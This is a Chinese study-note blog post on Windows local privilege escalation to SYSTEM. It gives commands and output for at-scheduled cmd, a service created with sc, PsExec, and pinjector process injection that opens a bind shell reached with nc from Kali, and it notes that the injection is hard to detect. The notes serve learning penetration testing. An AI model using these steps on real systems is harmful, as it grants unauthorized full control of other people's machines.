Kali linux 学习笔记（二十一）提权——本地提权（at、sc、Sysinternals Suite 套件、注入进程） 2020.3.3

前言

在之前的学习里
至少已实现低权限账号登录
那为了更好地控制目标机
我们需要将权限提高

默认用户
windows：

• user
• administrator
• system

linux：

• user
• root

显然，最好是能获得system和root权限

接下来在windows中进行提权

1、at提权（xp及03）

适用xp和2003
从admin提权为system

在cmd中：

 # 修改密码：net user username *
 C:\Documents and Settings\username>net user username *
  Type a password for the user:
  Retype the password to confirm:
  The command completed successfully.
  
# 查看系统用户：net user
 C:\Documents and Settings\username>net user
  User accounts for \\DH-CA8822AB9589
  ---------------------------------------------------------------------
  Administrator            Guest                    HelpAssistant
  IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     username
  SUPPORT_388945a0
  The command completed successfully.

 # 查看用户状态：
 C:\Documents and Settings\username>net user username
  User name                    username
  Full Name                    username
  Comment
  User's comment
  Country code                 000 (System Default)
  Account active               Yes
  Account expires              Never
  Password last set            2/28/2018 2:05 PM
  Password expires             Never
  Password changeable          2/28/2018 2:05 PM
  Password required            Yes
  User may change password     Yes
  Workstations allowed         All
  Logon script
  User profile
  Home directory
  Last logon                   2/28/2018 2:03 PM
  Logon hours allowed          All
  Local Group Memberships      *Administrators       *Users  #显示用户所在组
  Global Group memberships     *None
  The command completed successfully.

#at命令提权
  C:\Documents and Settings\kevin>cd \
  C:\>at -? #查看命令参数
  C:\>at 2:15 /interactive cmd  #未来时间（如延后1min），会到点以system启动cmd
   Added a new job with job ID = 1
  C:\>at
  Status ID   Day                     Time          Command Line
  ---------------------------------------------------------------------
          1   Today                  2:15 AM       cmd

此时，到设置的时间点2：15
会以system权限打开一个cmd
在这个新的cmd中

#system权限的任务管理器
  C:\WINDOWS\system32>taskmgr

打开一个system权限的任务管理器
在任务管理器里把explorer杀掉
再重新打开explorer（都是通过system权限的任务管理器）
成功获取system权限

2、sc提权（win7及8）

适用于win7和win8

cmd中：

C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact #配置一个服务syscmd
C:>sc start syscmd #启动服务获取system权限的cmd

以system权限打开一个cmd
然后同上

3、Sysinternals Suite 套件

下载Sysinternals Suite 套件
网上找一下就行

解压后
把 PsExec 放在C盘根目录

cmd中

  C:\>PsExec.exe
  -i: 交互模式
  -s: 使用系统账户
  C:\>PsExec.exe -i -s cmd #获取system权限的cmd

以system权限打开一个cmd
然后同上

4、注入进程提权

下载pinjector.exe
网上找一下，很小的

解压后
把pinjector.exe放在C盘根目录

cmd中

  C:\>pinjector.exe
  C:\>pinjector.exe -l #查看用法
  # 选择进程注入
  C:\>pinjector.exe -l
   PID    668 services.exe ( 16 Threads)  USER: \\NT AUTHORITY\SYSTEM
  C:\>pinjector.exe -p 668 cmd 555
   Privilege Switcher for Win32(Private version)
   (c) 2006 Andres Tarasco - [email protected]
   [+] Trying to execute cmd to 668 as: ? \
   [+] Code inyected... ; )
  C:\>netstat -nao | find "555" #查看被注入的进程的监听状态

kali里监听：

  root@kali：~# nc -nv 192.168.1.119 555
   Connection to 192.168.1.119 555 port [tcp/*] succeeded!
   Microsoft Windows XP [?汾 5.1.2600]
   (C) ??????? 1985-2001 Microsoft Corp

windows查看权限

 C:\WINDOWS\system32>whoami
   whoami
   SYSTEM

成功获取system权限

很难被发现
需要管理员对进程堆栈很熟悉

结语

提权有很多办法
本节也就学了点皮毛